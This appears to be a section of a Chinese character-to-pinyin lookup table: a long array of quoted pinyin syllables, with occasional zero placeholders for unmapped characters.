"qiong","tong","sang","sang","huan","ju","jiu","xue","duo","zhui","yu","zan",0,"ying","jie","liu","zhan","ya","rao","zhen","dang","qi","qiao","hua","gui","jiang","zhuang","xun","suo","sha","zhen","bei","ting","kuo","jing","po","ben","fu","rui","tong","jue","xi","lang","liu","feng","qi","wen","jun","gan","su","liang","qiu","ting","you","mei","bang","long","peng","zhuang","di","xuan","tu","zao","ao","gu","bi","di","han","zi","zhi","ren","bei","geng","jian","huan","wan","nuo","jia","tiao","ji","xiao","lu","hun","shao","cen","fen","song","meng","wu","li","li","dou","qin","ying","suo","ju","ti","xie","kun","zhuo","shu","chan","fan","wei","jing","li","bin","xia","fo","tao","zhi","lai","lian","jian","zhuo","ling","li","qi","bing","lun","cong","qian","mian","qi","qi","cai","gun","chan","de",
"fei","pai","bang","bang","hun","zong","cheng","zao","ji","li","peng","yu","yu","gu","jun","dong","tang","gang","wang","di","cuo","fan","cheng","zhan","qi","yuan","yan","yu","quan","yi","sen","ren","chui","leng","qi","zhuo","fu","ke","lai","zou","zou","zhao","guan","fen","fen","shen","qing","ni","wan","guo","lu","hao","jie","yi","chou","ju","ju","cheng","zuo","liang","qiang","zhi","chui","ya","ju","bei","jiao","zhuo","zi","bin","peng","ding","chu","chang","men","hua","jian","gui","xi","du","qian","dao","gui","dian","luo","zhi","quan","ming","fu","geng","peng","zhan","yi","tuo","sen","duo","ye","fu","wei","wei","duan","jia","zong","jian","yi","shen","xi","yan","yan","chuan","jian","chun","yu","he","zha","wo","pian","bi","yao","huo","xu","ruo","yang","la","yan","ben","hui","kui","jie",
"kui","si","feng","xie","tuo","zhi","jian","mu","mao","chu","hu","hu","lian","leng","ting","nan","yu","you","mei","song","xuan","xuan","yang","zhen","pian","ye","ji","jie","ye","chu","dun","yu","zou","wei","mei","ti","ji","jie","kai","qiu","ying","rou","huang","lou","le","quan","xiang","pin","shi","gai","tan","lan","wen","yu","chen","lu","ju","shen","chu","pi","xie","jia","yi","zhan","fu","nuo","mi","lang","rong","gu","jian","ju","ta","yao","zhen","bang","sha","yuan","zi","ming","su","jia","yao","jie","huang","gan","fei","zha","qian","ma","sun","yuan","xie","rong","shi","zhi","cui","yun","ting","liu","rong","tang","que","zhai","si","sheng","ta","ke","xi","gu","qi","gao","gao","sun","pan","tao","ge","xun","dian","nou","ji","shuo","gou","chui","qiang","cha","qian","huai","mei",
"xu","gang","gao","zhuo","tuo","qiao","yang","dian","jia","kan","zui","dao","long","bin","zhu","sang","xi","ji","lian","hui","yong","qian","guo","gai","gai","tuan","hua","qi","sen","cui","peng","you","hu","jiang","hu","huan","gui","nie","yi","gao","kang","gui","gui","cao","man","jin","di","zhuang","le","lang","chen","cong","li","xiu","qing","shuang","fan","tong","guan","ze","su","lei","lu","liang","mi","lou","chao","su","ke","chu","tang","biao","lu","jiu","zhe","zha","shu","zhang","man","mo","niao","yang","tiao","peng","zhu","sha","xi","quan","heng","jian","cong","ji","yan","qiang","xue","ying","er","xun","zhi","qiao","zui","cong","pu","shu","hua","kui","zhen","zun","yue","shan","xi","chun","dian","fa","gan","mo","wu","qiao","rao","lin","liu","qiao","xian","run","fan","zhan","tuo","lao","yun",
"shun","dun","cheng","tang","meng","ju","cheng","su","jue","jue","dian","hui","ji","nuo","xiang","tuo","ning","rui","zhu","tong","zeng","fen","qiong","ran","heng","qian","gu","liu","lao","gao","chu","xi","sheng","zi","san","ji","dou","jing","lu","jian","chu","yuan","ta","shu","jiang","tan","lin","nong","yin","xi","sui","shan","zui","xuan","cheng","gan","ju","zui","yi","qin","pu","yan","lei","feng","hui","dang","ji","sui","bo","ping","cheng","chu","zhua","gui","ji","jie","jia","qing","zhai","jian","qiang","dao","yi","biao","song","she","lin","li","cha","meng","yin","tao","tai","mian","qi","tuan","bin","huo","ji","qian","ni","ning","yi","gao","kan","yin","nou","qing","yan","qi","mi","zhao","gui","chun","ji","kui","po","deng","chu","ge","mian","you","zhi","huang","qian","lei","lei","sa","lu",
"li","cuan","lu","mie","hui","ou","lu","zhi","gao","du","yuan","li","fei","zhuo","sou","lian","jiang","chu","qing","zhu","lu","yan","li","zhu","chen","jie","e","su","huai","nie","yu","long","lai","jiao","xian","gui","ju","xiao","ling","ying","jian","yin","you","ying","xiang","nong","bo","chan","lan","ju","shuang","she","wei","cong","quan","qu","cang","jiu","yu","luo","li","cuan","luan","dang","jue","yan","lan","lan","zhu","lei","li","ba","nang","yu","ling","guang","qian","ci","huan","xin","yu","yi","qian","ou","xu","chao","chu","qi","kai","yi","jue","xi","xu","he","yu","kui","lang","kuan","shuo","xi","ai","yi","qi","chua","chi","qin","kuan","kan","kuan","kan","chuan","sha","gua","yin","xin","xie","yu","qian","xiao","ye","ge","wu","tan","jin","ou","hu","ti","huan","xu",
"pen","xi","xiao","chua","she","shan","han","chu","yi","e","yu","chuo","huan","zhi","zheng","ci","bu","wu","qi","bu","bu","wai","ju","qian","chi","se","chi","se","zhong","sui","sui","li","cuo","yu","li","gui","dai","e","si","jian","zhe","mo","mo","yao","mo","cu","yang","tian","sheng","dai","shang","xu","xun","shu","can","jue","piao","qia","qiu","su","qing","yun","lian","yi","fou","zhi","ye","can","hun","dan","ji","die","zhen","yun","wen","chou","bin","ti","jin","shang","yin","diao","jiu","hui","cuan","yi","dan","du","jiang","lian","bin","du","jian","jian","shu","ou","duan","zhu","yin","qing","yi","sha","qiao","ke","xiao","xun","dian","hui","hui","gu","qiao","ji","yi","ou","hui","duan","yi","xiao","wu","guan","mu","mei","mei","ai","jie","du","yu","bi","bi",
"bi","pi","pi","bi","chan","mao","hao","cai","pi","lie","jia","zhan","sai","mu","tuo","xun","er","rong","xian","ju","mu","hao","qiu","dou","sha","tan","pei","ju","duo","cui","bi","san","san","mao","sai","shu","yu","tuo","he","jian","ta","san","lu","mu","mao","tong","rong","chang","pu","lu","zhan","sao","zhan","meng","lu","qu","die","shi","di","min","jue","mang","qi","pie","nai","qi","dao","xian","chuan","fen","yang","nei","bin","fu","shen","dong","qing","qi","yin","xi","hai","yang","an","ya","ke","qing","ya","dong","dan","lu","qing","yang","yun","yun","shui","shui","zheng","bing","yong","dang","shui","le","ni","tun","fan","gui","ting","zhi","qiu","bin","ze","mian","cuan","hui","diao","han","cha","zhuo","chuan","wan","fan","da","xi","tuo","mang","qiu","qi","shan","pin",
"han","qian","wu","wu","xun","si","ru","gong","jiang","chi","wu","tu","jiu","tang","zhi","zhi","qian","mi","gu","wang","jing","jing","rui","jun","hong","tai","quan","ji","bian","bian","gan","wen","zhong","fang","xiong","jue","hu","niu","qi","fen","xu","xu","qin","yi","wo","yun","yuan","hang","yan","chen","chen","dan","you","dun","hu","huo","qi","mu","nu","mei","da","mian","mi","chong","pang","bi","sha","zhi","pei","pan","zhui","za","gou","liu","mei","ze","feng","ou","li","lun","cang","feng","wei","hu","mo","mei","shu","ju","zan","tuo","tuo","tuo","he","li","mi","yi","fa","fei","you","tian","zhi","zhao","gu","zhan","yan","si","kuang","jiong","ju","xie","qiu","yi","jia","zhong","quan","po","hui","mi","ben","ze","zhu","le","you","gu","hong","gan","fa","mao","si",
"hu","ping","ci","fan","zhi","su","ning","cheng","ling","pao","bo","qi","si","ni","ju","sa","zhu","sheng","lei","xuan","jue","fu","pan","min","tai","yang","ji","yong","guan","beng","xue","long","lu","dan","luo","xie","po","ze","jing","yin","pan","jie","yi","hui","hui","zai","cheng","yin","wei","hou","jian","yang","lie","si","ji","er","xing","fu","sa","se","zhi","yin","wu","xi","kao","zhu","jiang","luo","luo","an","dong","ti","mou","lei","yi","mi","quan","jin","po","wei","xiao","xie","hong","xu","su","kuang","tao","qie","ju","er","zhou","ru","ping","xun","xiong","zhi","guang","huan","ming","huo","wa","qia","pai","wu","qu","liu","yi","jia","jing","qian","jiang","jiao","zhen","shi","zhuo","ce","fa","hui","ji","liu","chan","hun","hu","nong","xun","jin","lie","qiu","wei",
"zhe","jun","han","bang","mang","zhuo","you","xi","bo","dou","huan","hong","yi","pu","ying","lan","hao","lang","han","li","geng","fu","wu","lian","chun","feng","yi","yu","tong","lao","hai","jin","jia","chong","jiong","mei","sui","cheng","pei","xian","shen","tu","kun","ping","nie","han","jing","xiao","she","nian","tu","yong","xiao","xian","ting","e","su","tun","juan","cen","ti","li","shui","si","lei","shui","tao","du","lao","lai","lian","wei","wo","yun","huan","di","heng","run","jian","zhang","se","fu","guan","xing","shou","shuan","ya","chuo","zhang","ye","kong","wo","han","tuo","dong","he","wo","ju","she","liang","hun","ta","zhuo","dian","qie","de","juan","zi","xi","xiao","qi","gu","guo","yan","lin","tang","zhou","peng","hao","chang","shu","qi","fang","zhi","lu","nao","ju","tao","cong",
"lei","zhe","ping","fei","song","tian","pi","dan","yu","ni","yu","lu","gan","mi","jing","ling","lun","yin","cui","qu","huai","yu","nian","shen","biao","chun","hu","yuan","lai","hun","qing","yan","qian","tian","miao","zhi","yin","mi","ben","yuan","wen","ruo","fei","qing","yuan","ke","ji","she","yuan","se","lu","zi","du","qi","jian","mian","pi","xi","yu","yuan","shen","shen","rou","huan","zhu","jian","nuan","yu","qiu","ting","qu","du","fan","zha","bo","wo","wo","di","wei","wen","ru","xie","ce","wei","he","gang","yan","hong","xuan","mi","ke","mao","ying","yan","you","hong","miao","sheng","mei","zai","hun","nai","gui","chi","e","pai","mei","lian","qi","qi","mei","tian","cou","wei","can","tuan","mian","hui","mo","xu","ji","pen","jian","jian","hu","feng","xiang","yi","yin",
"zhan","shi","jie","cheng","huang","tan","yu","bi","min","shi","tu","sheng","yong","ju","dong","tuan","jiao","jiao","qiu","yan","tang","long","huo","yuan","nan","ban","you","quan","zhuang","liang","chan","yan","chun","nie","zi","wan","shi","man","ying","la","kui","feng","jian","xu","lou","wei","gai","xia","ying","po","jin","yan","tang","yuan","suo","yuan","lian","yao","meng","zhun","cheng","ke","tai","ta","wa","liu","gou","sao","ming","zha","shi","yi","lun","ma","pu","wei","li","cai","wu","xi","wen","qiang","ze","shi","su","ai","qin","sou","yun","xiu","yin","rong","hun","su","suo","ni","ta","shi","ru","ai","pan","chu","chu","pang","weng","cang","mie","ge","dian","hao","huang","xi","zi","di","zhi","xing","fu","jie","hua","ge","zi","tao","teng","sui","bi","jiao","hui","gun","yin",
"gao","long","zhi","yan","she","man","ying","chun","lu","lan","luan","xiao","bin","tan","yu","xiu","hu","bi","biao","zhi","jiang","kou","shen","shang","di","mi","ao","lu","hu","hu","you","chan","fan","yong","gun","man","qing","yu","piao","ji","ya","chao","qi","xi","ji","lu","lou","long","jin","guo","cong","lou","zhi","gai","qiang","li","yan","cao","jiao","cong","chun","tuan","ou","teng","ye","xi","mi","tang","mo","shang","han","lian","lan","wa","chi","gan","feng","xuan","yi","man","zi","mang","kang","luo","peng","shu","zhang","zhang","zhuang","xu","huan","huo","jian","yan","shuang","liao","cui","ti","yang","jiang","cong","ying","hong","xun","shu","guan","ying","xiao","zong","kun","xu","lian","zhi","wei","pi","yu","jiao","po","dang","hui","jie","wu","pa","ji","pan","wei","su","qian","qian",
"xi","lu","xi","xun","dun","huang","min","run","su","lao","zhen","cong","yi","zhe","wan","shan","tan","chao","xun","kui","ye","shao","tu","zhu","sa","hei","bi","shan","chan","chan","shu","tong","pu","lin","wei","se","se","cheng","jiong","cheng","hua","jiao","lao","che","gan","cun","hong","si","shu","peng","han","yun","liu","hong","fu","hao","he","xian","jian","shan","xi","yu","lu","lan","ning","yu","lin","mian","zao","dang","huan","ze","xie","yu","li","shi","xue","ling","wan","zi","yong","hui","can","lian","dian","ye","ao","huan","zhen","chan","man","dan","dan","yi","sui","pi","ju","ta","qin","ji","zhuo","lian","nong","guo","jin","fen","se","ji","sui","hui","chu","ta","song","ding","se","zhu","lai","bin","lian","mi","shi","shu","mi","ning","ying","ying","meng","jin","qi",
"bi","ji","hao","ru","cui","wo","tao","yin","yin","dui","ci","huo","jing","lan","jun","ai","pu","zhuo","wei","bin","gu","qian","ying","bin","kuo","fei","cang","me","jian","wei","luo","zan","lu","li","you","yang","lu","si","zhi","ying","du","wang","hui","xie","pan","shen","biao","chan","mo","liu","jian","pu","se","cheng","gu","bin","huo","xian","lu","qin","han","ying","rong","li","jing","xiao","ying","sui","wei","xie","huai","xue","zhu","long","lai","dui","fan","hu","lai","shu","ling","ying","mi","ji","lian","jian","ying","fen","lin","yi","jian","yue","chan","dai","rang","jian","lan","fan","shuang","yuan","zhuo","feng","she","lei","lan","cong","qu","yong","qian","fa","guan","que","yan","hao","ying","sa","zan","luan","yan","li","mi","shan","tan","dang","jiao","chan","ying","hao","ba",
"zhu","lan","lan","nang","wan","luan","xun","xian","yan","gan","yan","yu","huo","biao","mie","guang","deng","hui","xiao","xiao","hui","hong","ling","zao","zhuan","jiu","zha","xie","chi","zhuo","zai","zai","can","yang","qi","zhong","fen","niu","jiong","wen","po","yi","lu","chui","pi","kai","pan","yan","kai","pang","mu","chao","liao","gui","kang","dun","guang","xin","zhi","guang","guang","wei","qiang","bian","da","xia","zheng","zhu","ke","zhao","fu","ba","xie","duo","ling","zhuo","xuan","ju","tan","pao","jiong","pao","tai","tai","bing","yang","tong","han","zhu","zha","dian","wei","shi","lian","chi","huang","zhou","hu","shuo","lan","ting","jiao","xu","heng","quan","lie","huan","yang","xiu","xiu","xian","yin","wu","zhou","yao","shi","wei","tong","mie","zai","kai","hong","lao","xia","zhu","xuan","zheng","po","yan",
"hui","guang","che","hui","kao","chen","fan","shao","ye","hui",0,"tang","jin","re","lie","xi","fu","jiong","xie","pu","ting","zhuo","ting","wan","hai","peng","lang","yan","xu","feng","chi","rong","hu","xi","shu","he","xun","ku","juan","xiao","xi","yan","han","zhuang","jun","di","xie","ji","wu","yan","lu","han","yan","huan","men","ju","dao","bei","fen","lin","kun","hun","tun","xi","cui","wu","hong","chao","fu","wo","jiao","cong","feng","ping","qiong","ruo","xi","qiong","xin","chao","yan","yan","yi","jue","yu","gang","ran","pi","xiong","wang","sheng","chang","shao","xiong","nian","geng","wei","chen","he","kui","zhong","duan","xia","hui","feng","lian","xuan","xing","huang","jiao","jian","bi","ying","zhu","wei","tuan","shan","xi","nuan","nuan","chan","yan","jiong","jiong","yu","mei","sha","wei","zha",
"xin","qiong","rou","mei","huan","xu","zhao","wei","fan","qiu","sui","yang","lie","zhu","jie","gao","gua","bao","hu","yun","xia","shi","liang","bian","gou","tui","tang","chao","shan","en","bo","huang","xie","xi","wu","xi","yun","he","he","xi","yun","xiong","nai","shan","qiong","yao","xun","mi","lian","ying","wu","rong","gong","yan","qiang","liu","xi","bi","biao","cong","lu","jian","shu","yi","lou","peng","sui","yi","teng","jue","zong","yun","hu","yi","zhi","ao","wei","liu","han","ou","re","jiong","man","kun","shang","cuan","zeng","jian","xi","xi","xi","yi","xiao","chi","huang","chan","ye","tan","ran","yan","xian","qiao","jun","deng","dun","shen","jiao","fen","si","liao","yu","lin","tong","shao","fen","fan","yan","xun","lan","mei","tang","yi","jing","men","jing","jiao","ying","yu","yi",
"xue","lan","tai","zao","can","sui","xi","que","cong","lian","hui","zhu","xie","ling","wei","yi","xie","zhao","hui","da","nong","lan","ru","xian","kao","xun","jin","chou","dao","yao","he","lan","biao","rong","li","mo","bao","ruo","lu","la","ao","xun","kuang","shuo","liao","li","lu","jue","liao","yan","xi","xie","long","ye","can","rang","yue","lan","cong","jue","chong","guan","ju","che","mi","tang","lan","zhu","lan","ling","cuan","yu","zhao","zhao","pa","zheng","pao","cheng","yuan","ai","wei","han","jue","jue","fu","ye","ba","die","ye","yao","zu","shuang","er","pan","chuang","ke","zang","die","qiang","yong","qiang","pian","ban","pan","chao","jian","pai","du","chuang","yu","zha","bian","die","bang","bo","chuang","you","you","du","ya","cheng","niu","niu","pin","jiu","mou","ta","mu","lao",
"ren","mang","fang","mao","mu","gang","wu","yan","ge","bei","si","jian","gu","you","ge","sheng","mu","di","qian","quan","quan","zi","te","xi","mang","keng","qian","wu","gu","xi","li","li","pou","ji","gang","zhi","ben","quan","chun","du","ju","jia","jian","feng","pian","ke","ju","kao","chu","xi","bei","luo","jie","ma","san","wei","mao","dun","tong","qiao","jiang","xi","li","du","lie","pai","piao","bo","xi","chou","wei","kui","chou","quan","quan","ba","fan","qiu","ji","cai","zhuo","an","ge","zhuang","guang","ma","you","kang","bo","hou","ya","yin","huan","zhuang","yun","kuang","niu","di","qing","zhong","mu","bei","pi","ju","yi","sheng","pao","xia","tuo","hu","ling","fei","pi","ni","yao","you","gou","xue","ju","dan","bo","ku","xian","ning","huan","hen","jiao","he","zhao",
"ji","xun","shan","ta","rong","shou","tong","lao","du","xia","shi","kuai","zheng","yu","sun","yu","bi","mang","xi","juan","li","xia","yin","suan","lang","bei","zhi","yan","sha","li","han","xian","jing","pai","fei","xiao","bai","qi","ni","biao","yin","lai","lie","jian","qiang","kun","yan","guo","zong","mi","chang","yi","zhi","zheng","ya","meng","cai","cu","she","lie","dian","luo","hu","zong","gui","wei","feng","wo","yuan","xing","zhu","mao","wei","chuan","xian","tuan","ya","nao","xie","jia","hou","bian","you","you","mei","cha","yao","sun","bo","ming","hua","yuan","sou","ma","yuan","dai","yu","shi","hao","qiang","yi","zhen","cang","hao","man","jing","jiang","mo","zhang","chan","ao","ao","hao","cui","ben","jue","bi","bi","huang","pu","lin","xu","tong","yao","liao","shuo","xiao","shou","dun",
"jiao","ge","juan","du","hui","kuai","xian","xie","ta","xian","xun","ning","pin","huo","nou","meng","lie","nao","guang","shou","lu","ta","xian","mi","rang","huan","nao","luo","xian","qi","jue","xuan","miao","zi","lu","lu","yu","su","wang","qiu","ga","ding","le","ba","ji","hong","di","chuan","gan","jiu","yu","qi","yu","chang","ma","gong","wu","fu","wen","jie","ya","bin","bian","bang","yue","jue","men","jue","wan","jian","mei","dan","pin","wei","huan","xian","qiang","ling","dai","yi","an","ping","dian","fu","xuan","xi","bo","ci","gou","jia","shao","po","ci","ke","ran","sheng","shen","yi","zu","jia","min","shan","liu","bi","zhen","zhen","jue","fa","long","jin","jiao","jian","li","guang","xian","zhou","gong","yan","xiu","yang","xu","luo","su","zhu","qin","yin","xun","bao","er",
"xiang","yao","xia","hang","gui","chong","xu","ban","pei","lao","dang","ying","hui","wen","e","cheng","di","wu","wu","cheng","jun","mei","bei","ting","xian","chu","han","xuan","yan","qiu","xuan","lang","li","xiu","fu","liu","ya","xi","ling","li","jin","lian","suo","suo","feng","wan","dian","pin","zhan","se","min","yu","ju","chen","lai","wen","sheng","wei","tian","chu","zuo","beng","cheng","hu","qi","e","kun","chang","qi","beng","wan","lu","cong","guan","yan","diao","bei","lin","qin","pi","pa","que","zhuo","qin","fa","jin","qiong","du","jie","hun","yu","mao","mei","chun","xuan","ti","xing","dai","rou","min","jian","wei","ruan","huan","xie","chuan","jian","zhuan","chang","lian","quan","xia","duan","yuan","ya","nao","hu","ying","yu","huang","rui","se","liu","shi","rong","suo","yao","wen","wu",
"zhen","jin","ying","ma","tao","liu","tang","li","lang","gui","zhen","qiang","cuo","jue","zhao","yao","ai","bin","shu","chang","kun","zhuan","cong","jin","yi","cui","cong","qi","li","ying","suo","qiu","xuan","ao","lian","men","zhang","yin","hua","ying","wei","lu","wu","deng","xiu","zeng","xun","qu","dang","lin","liao","qiong","su","huang","gui","pu","jing","fan","jin","liu","ji","hui","jing","ai","bi","can","qu","zao","dang","jiao","gun","tan","hui","huan","se","sui","tian","chu","yu","jin","lu","bin","shu","wen","zui","lan","xi","zi","xuan","ruan","wo","gai","lei","du","li","zhi","rou","li","zan","qiong","ti","gui","sui","la","long","lu","li","zan","lan","ying","mi","xiang","qiong","guan","dao","zan","huan","gua","bo","die","bo","hu","zhi","piao","ban","rang","li","wa",0,
"xiang","qian","ban","pen","fang","dan","weng","ou",0,0,"wa","hu","ling","yi","ping","ci","bai","juan","chang","chi",0,"dang","meng","bu","zhui","ping","bian","zhou","zhen",0,"ci","ying","qi","xian","lou","di","ou","meng","zhuan","beng","lin","zeng","wu","pi","dan","weng","ying","yan","gan","dai","shen","tian","tian","han","chang","sheng","qing","shen","chan","chan","rui","sheng","su","shen","yong","shuai","lu","fu","yong","beng","feng","ning","tian","you","jia","shen","zha","dian","fu","nan","dian","ping","ting","hua","ting","zhen","zai","meng","bi","qi","liu","xun","liu","chang","mu","yun","fan","fu","geng","tian","jie","jie","quan","wei","fu","tian","mu","duo","pan","jiang","wa","da","nan","liu","ben","zhen","chu","mu","mu","ce","tian","gai","bi","da","zhi","e","qi","lue","pan",
"yi","fan","hua","she","yu","mu","jun","yi","liu","she","die","chou","hua","dang","zhui","ji","wan","jiang","cheng","chang","tun","lei","ji","cha","liu","die","tuan","lin","jiang","jiang","chou","pi","die","die","pi","jie","dan","shu","shu","zhi","yi","ne","nai","ding","bi","jie","liao","gang","ge","jiu","zhou","xia","shan","xu","nue","li","yang","chen","you","ba","jie","jue","qi","xia","cui","bi","yi","li","zong","chuang","feng","zhu","pao","pi","gan","ke","ci","xue","zhi","dan","zhen","fa","zhi","teng","ju","ji","fei","ju","shan","jia","xuan","zha","bing","nie","zheng","yong","jing","quan","teng","tong","yi","jie","wei","hui","tan","yang","chi","zhi","hen","ya","mei","dou","jing","xiao","tong","tu","mang","pi","xiao","suan","fu","li","zhi","cuo","duo","wu","sha","lao","shou",
"huan","xian","yi","beng","zhang","guan","tan","fei","ma","lin","chi","ji","tian","an","chi","bi","bi","min","gu","dui","e","wei","yu","cui","ya","zhu","cu","dan","shen","zhong","chi","yu","hou","feng","la","yang","chen","tu","yu","guo","wen","huan","ku","jia","yin","yi","lou","sao","jue","chi","xi","guan","yi","wen","ji","chuang","ban","hui","liu","chai","shou","nue","dian","da","bie","tan","zhang","biao","shen","cu","luo","yi","zong","chou","zhang","zhai","sou","se","que","diao","lou","lou","mo","qin","yin","ying","huang","fu","liao","long","qiao","liu","lao","xian","fei","dan","yin","he","ai","ban","xian","guan","gui","nong","yu","wei","yi","yong","pi","lei","li","shu","dan","lin","dian","lin","lai","bie","ji","chi","yang","xuan","jie","zheng","me","li","huo","lai","ji",
"dian","xuan","ying","yin","qu","yong","tan","dian","luo","luan","luan","bo","bo","gui","ba","fa","deng","fa","bai","bai","qie","ji","zao","zao","mao","de","pa","jie","huang","gui","ci","ling","gao","mo","ji","jiao","peng","gao","ai","e","hao","han","bi","wan","chou","qian","xi","ai","xiao","hao","huang","hao","ze","cui","hao","xiao","ye","po","hao","jiao","ai","xing","huang","li","piao","he","jiao","pi","gan","pao","zhou","jun","qiu","cun","que","zha","gu","jun","jun","zhou","zha","gu","zhao","du","min","qi","ying","yu","bei","zhao","zhong","pen","he","ying","he","yi","bo","wan","he","ang","zhan","yan","jian","he","yu","kui","fan","gai","dao","pan","fu","qiu","sheng","dao","lu","zhan","meng","li","jin","xu","jian","pan","guan","an","lu","xu","zhou","dang","an",
"gu","li","mu","ding","gan","xu","mang","wang","zhi","qi","yuan","tian","xiang","dun","xin","xi","pan","feng","dun","min","ming","sheng","shi","yun","mian","pan","fang","miao","dan","mei","mao","kan","xian","kou","shi","yang","zheng","yao","shen","huo","da","zhen","kuang","ju","shen","yi","sheng","mei","mo","zhu","zhen","zhen","mian","shi","yuan","die","ni","zi","zi","chao","zha","xuan","bing","mi","long","sui","tong","mi","die","di","ne","ming","xuan","chi","kuang","juan","mou","zhen","tiao","yang","yan","mo","zhong","mo","zhe","zheng","mei","suo","shao","han","huan","di","cheng","cuo","juan","e","man","xian","xi","kun","lai","jian","shan","tian","gun","wan","leng","shi","qiong","lie","ya","jing","zheng","li","lai","sui","juan","shui","sui","du","bi","pi","mu","hun","ni","lu","yi","jie","cai",
"zhou","yu","hun","ma","xia","xing","hui","gun","zai","chun","jian","mei","du","hou","xuan","tian","kui","gao","rui","mao","xu","fa","wo","miao","chou","kui","mi","weng","kou","dang","chen","ke","sou","xia","qiong","mo","ming","man","shui","ze","zhang","yi","diao","kou","mo","shun","cong","lou","chi","man","piao","cheng","gui","meng","huan","run","pie","xi","qiao","pu","zhu","deng","shen","shun","liao","che","xian","kan","ye","xu","tong","mou","lin","gui","jian","ye","ai","hui","zhan","jian","gu","zhao","qu","mei","chou","sao","ning","xun","yao","huo","meng","mian","pin","mian","li","kuang","jue","xuan","mian","huo","lu","meng","long","guan","man","xi","chu","tang","kan","zhu","mao","jin","lin","yu","shuo","ze","jue","shi","yi","shen","zhi","hou","shen","ying","ju","zhou","jiao","cuo","duan",
"ai","jiao","zeng","yue","ba","shi","ding","qi","ji","zi","gan","wu","zhe","ku","gang","xi","fan","kuang","dang","ma","sha","dan","jue","li","fu","min","e","huo","kang","zhi","qi","kan","jie","bin","e","ya","pi","zhe","yan","sui","zhuan","che","dun","pan","yan","jin","feng","fa","mo","zha","ju","yu","ke","tuo","tuo","di","zhai","zhen","e","fu","mu","zhu","la","bian","nu","ping","peng","ling","pao","le","po","bo","po","shen","za","ai","li","long","tong","yong","li","kuang","chu","keng","quan","zhu","kuang","gui","e","nao","qia","lu","wei","ai","ge","xian","xing","yan","dong","peng","xi","lao","hong","shuo","xia","qiao","qing","wei","qiao","yi","keng","xiao","que","chan","lang","hong","yu","xiao","xia","mang","luo","yong","che","che","wo","liu","ying","mang","que",
"yan","sha","kun","yu","chi","hua","lu","chen","jian","nue","song","zhuo","keng","peng","yan","zhui","kong","cheng","qi","zong","qing","lin","jun","bo","ding","min","diao","jian","he","lu","ai","sui","que","leng","bei","yin","dui","wu","qi","lun","wan","dian","nao","bei","qi","chen","ruan","yan","die","ding","du","tuo","jie","ying","bian","ke","bi","wei","shuo","zhen","duan","xia","dang","ti","nao","peng","jian","di","tan","cha","tian","qi","dun","feng","xuan","que","que","ma","gong","nian","su","e","ci","liu","si","tang","bang","hua","pi","wei","sang","lei","cuo","tian","xia","xi","lian","pan","wei","yun","dui","zhe","ke","la","zhuan","qing","gun","zhuan","chan","qi","ao","peng","liu","lu","kan","chuang","chen","yin","lei","biao","qi","mo","qi","cui","zong","qing","chuo","lun","ji",
"shan","lao","qu","zeng","deng","jian","xi","lin","ding","tan","huang","pan","za","qiao","di","li","jian","jiao","xi","zhang","qiao","dun","jian","yu","zhui","he","ke","ze","lei","ke","chu","ye","que","dang","yi","jiang","pi","pi","yu","pin","e","ai","ke","jian","yu","ruan","meng","pao","ci","bo","yang","ma","ca","xian","kuang","lei","lei","zhi","li","li","fan","que","pao","ying","li","long","long","mo","bo","shuang","guan","lan","zan","yan","shi","shi","li","reng","she","yue","si","qi","ta","ma","xie","yao","xian","qi","qi","zhi","beng","dui","zhong","ren","yi","shi","you","zhi","tiao","fu","fu","mi","zu","zhi","suan","mei","zuo","qu","hu","zhu","shen","sui","ci","chai","mi","lu","yu","xiang","wu","tiao","piao","zhu","gui","xia","zhi","ji","gao","zhen","gao",
"shui","jin","shen","gai","kun","di","dao","huo","tao","qi","gu","guan","zui","ling","lu","bing","jin","dao","zhi","lu","chan","bei","zhe","hui","you","xi","yin","zi","huo","zhen","fu","yuan","wu","xian","yang","zhi","yi","mei","si","di","bei","zhuo","zhen","yong","ji","gao","tang","si","ma","ta","fu","xuan","qi","yu","xi","ji","si","chan","dan","gui","sui","li","nong","mi","dao","li","rang","yue","ti","zan","lei","rou","yu","yu","li","xie","qin","he","tu","xiu","si","ren","tu","zi","cha","gan","yi","xian","bing","nian","qiu","qiu","zhong","fen","hao","yun","ke","miao","zhi","jing","bi","zhi","yu","mi","ku","ban","pi","ni","li","you","zu","pi","bo","ling","mo","cheng","nian","qin","yang","zuo","zhi","zhi","shu","ju","zi","huo","ji","cheng","tong",
"zhi","huo","he","yin","zi","zhi","jie","ren","du","yi","zhu","hui","nong","fu","xi","kao","lang","fu","xun","shui","lu","kun","gan","jing","ti","cheng","tu","shao","shui","ya","lun","lu","gu","zuo","ren","zhun","bang","bai","ji","zhi","zhi","kun","leng","peng","ke","bing","chou","zui","yu","su","lue","xiang","yi","xi","bian","ji","fu","pi","nuo","jie","zhong","zong","xu","cheng","dao","wen","xian","zi","yu","ji","xu","zhen","zhi","dao","jia","ji","gao","gao","gu","rong","sui","rong","ji","kang","mu","can","mei","zhi","ji","lu","su","ji","ying","wen","qiu","se","he","yi","huang","qie","ji","sui","xiao","pu","jiao","zhuo","zhong","zui","lu","sui","nong","se","hui","rang","nuo","yu","pin","ji","tui","wen","cheng","huo","kuang","lu","biao","se","rang","zhuo","li",
"cuan","xue","wa","jiu","qiong","xi","qiong","kong","yu","shen","jing","yao","chuan","zhun","tu","lao","qie","zhai","yao","bian","bao","yao","bing","wa","zhu","jiao","qiao","diao","wu","gui","yao","zhi","chuang","yao","tiao","jiao","chuang","jiong","xiao","cheng","kou","cuan","wo","dan","ku","ke","zhuo","xu","su","guan","kui","dou","zhuo","xun","wo","wa","ya","yu","ju","qiong","yao","yao","tiao","chao","yu","tian","diao","ju","liao","xi","wu","kui","chuang","zhao","kuan","kuan","long","cheng","cui","piao","zao","cuan","qiao","qiong","dou","zao","long","qie","li","chu","shi","fu","qian","chu","hong","qi","hao","sheng","fen","shu","miao","qu","zhan","zhu","ling","long","bing","jing","jing","zhang","bai","si","jun","hong","tong","song","jing","diao","yi","shu","jing","qu","jie","ping","duan","shao","zhuan","ceng","deng",
